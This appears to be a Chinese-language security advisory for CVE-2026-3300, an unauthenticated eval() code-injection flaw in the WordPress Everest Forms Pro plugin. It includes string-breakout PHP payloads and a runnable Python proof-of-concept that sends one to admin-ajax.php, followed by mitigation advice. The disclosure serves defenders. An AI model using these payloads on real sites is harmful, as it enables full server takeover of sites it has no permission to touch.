CVE-2026-3300 CVSS 9.8 严重

CVE-2026-3300 WordPress Everest Forms Pro远程代码执行漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3300

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Everest Forms Pro 插件

漏洞概述

WordPress Everest Forms Pro插件存在严重安全漏洞，影响1.9.12及以下所有版本。该漏洞源于插件计算附加组件的`process_filter()`函数在处理表单数据时，未对用户输入进行充分过滤，直接将其拼接到PHP代码字符串中并通过`eval()`函数执行。由于`sanitize_text_field()`无法转义单引号等关键字符，未经身份验证的攻击者可利用此漏洞，向使用“Complex Calculation”功能的表单提交恶意数据，从而在服务器端注入并执行任意PHP代码，完全控制受影响网站。

技术细节

漏洞的核心在于插件对“Complex Calculation”功能的处理逻辑。当表单提交时，`process_filter()`函数收集用户输入的字符串类型字段（如text, email等），并将其直接拼接用于动态计算的PHP表达式中。尽管开发者使用了`sanitize_text_field()`函数试图清理输入，但该函数主要用于防止XSS攻击，并未针对PHP代码上下文转义单引号（'）或双引号。攻击者可以构造包含恶意PHP语法的载荷（例如`');system('ls');//`），从而闭合原有的字符串上下文并插入任意命令。当服务器调用`eval()`执行拼接后的字符串时，恶意代码即被解析运行，导致服务器被完全控制。

攻击链分析

STEP 1

侦察

攻击者识别出目标WordPress站点安装了Everest Forms Pro插件，且版本在1.9.12及以下。

STEP 2

漏洞识别

攻击者确认目标站点上的某个表单启用了“Complex Calculation”（复杂计算）功能。

STEP 3

载荷构造

攻击者构造恶意的字符串数据，包含能够闭合PHP字符串上下文并插入恶意代码的字符（如单引号、分号）。

STEP 4

漏洞利用

攻击者向表单提交端点发送POST请求，将恶意载荷注入到字符串类型的表单字段中。

STEP 5

代码执行

插件后端处理表单时，将用户输入拼接进字符串并传给`eval()`，导致恶意PHP代码在服务器端执行，攻击者获取服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-3300
# Target: WordPress site with Everest Forms Pro <= 1.9.12
# Note: The form must use the "Complex Calculation" feature.

target_url = "http://example.com/wp-admin/admin-ajax.php"
# The payload injects PHP code to execute a system command (e.g., id)
# Context: $input_value = 'USER_INPUT'; -> Payload: ');system('id');//
payload_data = {
    "action": "evf_submit_form",
    "everest_forms[id]": "1",
    # Malicious input breaking out of the string inside eval()
    "everest_forms[field_text]": "');phpinfo();//"
}

headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    response = requests.post(target_url, data=payload_data, headers=headers, timeout=10)
    if response.status_code == 200:
        # Check if phpinfo output is present in the response
        if "PHP Version" in response.text:
            print("[+] Exploit successful! RCE achieved.")
        else:
            print("[-] Exploit failed or target not vulnerable.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Everest Forms Pro <= 1.9.12

防御指南

临时缓解措施

建议尽快检查并更新插件至修复版本。若无法立即更新，应通过WAF添加规则，过滤表单提交中包含的PHP代码特征字符（如单引号、反引号、eval等），并暂时停用受影响的计算功能以阻断攻击路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表